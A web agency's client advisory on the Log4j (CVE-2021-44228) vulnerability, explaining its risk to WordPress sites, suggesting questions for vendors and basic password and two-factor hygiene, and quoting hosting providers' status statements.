By now, you’ve probably heard about the most recent cybersecurity panic regarding a vulnerability in a Java code library called Log4j. At Yoko Co, we take cybersecurity very seriously, so we want to provide some clarity on this quick-moving issue, along with a summary of how it’s affecting a range of popular web hosts and services. This article may be updated as we learn more about the situation, so make a note to check back for the latest news.
Before we get into the details: If you’re currently a Yoko Co client, here’s a quick summary of what you need to know.
- If we host your website, you do not need to worry about Log4j.
- If we do not host your website, reach out to your hosting provider to ask how this is impacting your website. (If you’re not sure how to handle this, we can help.)
- If you’re using Hubspot, they are aware of the issue and working on a solution
What is Log4j?
Log4j is open-source software used by many servers across the internet to record a log of activity and send it to a centralized server. The Log4j software is likely to be found anywhere that the Java programming language is used, including on a large swath of toolsets used on Apache servers, which is the most popular server software in the world.
What is the Log4j vulnerability?
The vulnerability, which was originally reported on November 24th, 2021, provides the ability to issue commands to a server via the Log4j library and take over the system. In theory, this means that bad actors can:
- See sensitive user data
- Install malware and spyware
- Use the machine(s) for nefarious purposes
You may read a lot of hyperbolic statements about this vulnerability, and for good reason: This is a very big issue.
Is My WordPress Site Affected by Log4J?
While we are still learning about the pervasiveness of this vulnerability, a few patterns exist:
- Most WordPress websites are unlikely to be affected directly by this vulnerability because they are PHP programs and do not use Java. If you host with Yoko Co or on a Managed WordPress solution like WPEngine, Kinsta, or Pantheon, your servers are highly unlikely to use Log4j.
- CloudFlare is an optimization service that helps power many WordPress websites (along with a lot of other things), and they have announced that their systems were exposed to this vulnerability. They took quick action to patch the vulnerability and have been helping other service providers do the same. Most WordPress sites using CloudFlare, however, are unlikely to be at risk because CloudFlare is never used after a user logs in. This means that only unauthenticated, unprivileged data would be at risk.
- The most exposed services will be those that offer user data syndication such as CRMs. Any vulnerability to a WordPress site data will likely only be through an integration with one of these systems.
What should I ask my vendors about Log4J?
By now, most service providers and vendors will have done a thorough investigation into their exposure risk, so you should be able to contact them with questions such as:
- Do you use the Log4j library?
- Has my data been compromised by any exploitation of the Log4j vulnerability?
- What can I do to safeguard my data?
What should I do to mitigate my risk?
While we are still learning about the effects of this vulnerability, it is safe to say that cybercriminal intent is usually consistent and typically tied to the extraction of easily-accessible funds through means like ransomware and identity theft. The best first step to mitigate risks is to evaluate your cybersecurity practices with your web or IT vendor. Using the following tools and practices can help ensure that any of your data exposed by this vulnerability, or ones caused by it, do not compromise you or your organization:
- Use a password manager to generate and store secure passwords to all of your accounts. The general rule of thumb is that if you can remember a password, then it’s no good. No password should never be used twice.
- Use 2-Factor Authentication everywhere it is available.
- Change passwords to critical systems and logins on a regular basis (2-3 times a year, if possible.)
Which platforms are affected by Log4j?
Our team has been reaching out to popular hosting platforms and vendors to get a status on their Log4j exposure and risk mitigation efforts. We will keep this updated as more information becomes available.
Is Kinsta.com affected by Log4j?
Statement from Kinsta.com on 12/15/21
The log4j/Log4Shell (CVE-2021-44228) only affects Java software that uses the log4j library. The only Java software ever supported on Kinsta was ElasticSearch, and we have several mitigations in place which prevent any exploitation of this, and if you don’t have ElasticSearch on your WordPress site you are unaffected.
Is WPEngine.com affected by Log4j?
Statement from WPEngine on 12/15/21
At WP Engine, Log4J is NOT used for any customer-facing or internet-facing systems.
As such, you are covered from this vulnerability and can rest assured your website is not impacted.
Is HubSpot.com affected by Log4j?
Statement from HubSpot on 12/14/21
HubSpot is aware of CVE-2021-44228 and we have performed a thorough check of our systems and have seen no indications of any impact from this vulnerability at this time. Out of an abundance of caution, our team is continuing to monitor this event. Customers don’t need to take any action at this time.
Is CloudFlare affected by Log4j?
Status: Resolved and helped integrated systems limit exposure
Is Pantheon.io affected by Log4j?
Is Google Analytics affected by Log4j?
Status: Ongoing mitigation efforts across all Google Cloud Services
Are Google Ad Services affected by Log4j?
Is Salesforce affected by Log4j?
Is cPanel affected by Log4j?
Is AWS affected by Log4j?
Is GitHub affected by Log4j?
Take Control of Your Cybersecurity
We know that cybersecurity best practices are ever-evolving, and we aim to take an adaptive, responsive approach to evolve with them. If you have questions about your digital presence or website cybersecurity, we encourage you to get in touch.